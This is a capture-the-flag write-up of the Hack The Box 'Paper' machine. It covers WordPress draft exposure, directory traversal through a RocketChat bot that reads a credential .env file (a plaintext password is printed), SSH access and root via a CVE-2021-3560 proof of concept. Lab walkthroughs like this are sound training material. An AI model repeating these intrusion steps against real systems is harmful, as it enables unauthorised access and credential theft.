HTB Write-up | Paper
A quick initial scan discloses web services running on ports 80
and 443
, as well as an SSH
server running on port 22
:
~ nmap 10.10.11.143 -F -Pn
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
A closer look at these ports doesn't reveal anything too interesting, and both the secure and non-secure versions of the website show the same boilerplate content:
However, looking at the server response for this page, we can see an interesting header:
When we configure this virtual host locally, we see a blog for the "Blunder Tiffin Paper Company":
~ sudo nano /etc/hosts
...
10.10.11.143 office.paper
Going through the posts we can see some hints:
So, ... Prisonmike
is supposed to be the only user but nick
commented that they should "remove the secret content" from the drafts ... interesting.
Running nikto
we can see that this is a Wordpress blog:
~ nikto -h http://office.paper/
...
+ Uncommon header 'link' found, with contents: <http://office.paper/index.php/wp-json/>; rel="https://api.w.org/"
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
wpscan
identified that the blog is using version 5.2.3
of Wordpress, which has many known vulnerabilities, however, one stands out, since it doesn't require valid credentials and it has to do with accessing user drafts:
~ wpscan --url office.paper --api-token <your-api-token>
...
| [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
...
Using the trick described in this blog post we find a draft post with some secrets:
So, there's a "Secret Registration URL of new Employee chat system", which is hosted at chat.office.paper
, let's configure this virtual host:
~ sudo nano /etc/hosts
...
10.10.11.143 office.paper
10.10.11.143 chat.office.paper
Now, we can see the chat system and register a new account.
Turns out this application is an instance of RocketChat:
After scrolling to the top of the #general
channel, we can see that there's a helpful bot called recyclops
which, among other things, can fetch files in the local machine:
There's even a security-related warning:
Ok, let's see what this baby can do:
Let's see if we can list other directories ...
~ list ../
total 56
drwx------ 12 dwight dwight 4096 Mar 20 10:52 .
drwxr-xr-x. 3 root root 20 Mar 20 10:54 ..
-rw------- 1 dwight dwight 1486 Mar 20 11:21 .bash_history
-rw-r--r-- 1 dwight dwight 18 May 10 2019 .bash_logout
-rw-r--r-- 1 dwight dwight 141 May 10 2019 .bash_profile
-rw-r--r-- 1 dwight dwight 358 Jul 3 2021 .bashrc
-rwxr-xr-x 1 dwight dwight 1174 Sep 16 2021 bot_restart.sh
drwx------ 2 dwight dwight 6 Mar 18 12:47 .cache
drwx------ 5 dwight dwight 56 Jul 3 2021 .config
-rw------- 1 dwight dwight 18 Mar 19 02:39 .dbshell
-rw------- 1 dwight dwight 16 Jul 3 2021 .esd_auth
drwx------ 3 dwight dwight 69 Mar 19 02:39 .gnupg
drwx------ 8 dwight dwight 4096 Mar 19 10:11 hubot
-rw-rw-r-- 1 dwight dwight 18 Sep 16 2021 .hubot_history
drwx------ 3 dwight dwight 19 Jul 3 2021 .local
drwxr-xr-x 4 dwight dwight 39 Jul 3 2021 .mozilla
drwxrwxr-x 5 dwight dwight 83 Jul 3 2021 .npm
-rw------- 1 dwight dwight 7 Mar 18 12:56 .python_history
drwxr-xr-x 4 dwight dwight 32 Jul 3 2021 sales
drwx------ 2 dwight dwight 6 Sep 16 2021 .ssh
-r-------- 1 dwight dwight 33 Mar 18 01:54 user.txt
drwxr-xr-x 2 dwight dwight 24 Sep 16 2021 .vim
-rw------- 1 dwight dwight 2657 Mar 20 08:31 .viminfo
The hubot
directory looks interesting, particularly because it has a .env
file, which usually stores credentials:
list ../hubot
...
-rw-r--r-- 1 dwight dwight 258 Sep 16 2021 .env
Yes, we have some creds!
~ file ../hubot/.env
export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Queenofblad3s!23
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1
And we can use them to SSH
into the machine as dwight
!
linpeas.sh
is pretty good at identifying privilege escalation issues, so let's start by sending the script to the machine's /tmp
file:
~ scp linpeas.sh dwight@10.10.11.143:/tmp
~ ssh dwight@10.10.11.143
[dwight@paper ~]$ cd /tmp/
[dwight@paper tmp]$ chmod +x linpeas.sh
[dwight@paper tmp]$ ./linpeas.sh
When we run this script we immediately get a warning that the machine is vulnerable to CVE-2021-3560
:
OK, let's grab a poc and send it to the /tmp
dir:
~ scp -r CVE-2021-3560.py dwight@10.10.11.143:/tmp/CVE-2021-3560.py
~ ssh dwight@10.10.11.143
[dwight@paper ~]$ python3 CVE-2021-3560.py
[root@paper dwight]# cd /root
[root@paper ~]# cat root.txt
580aba1066f998cbf4a03deb6f758717
Just like that, we're done!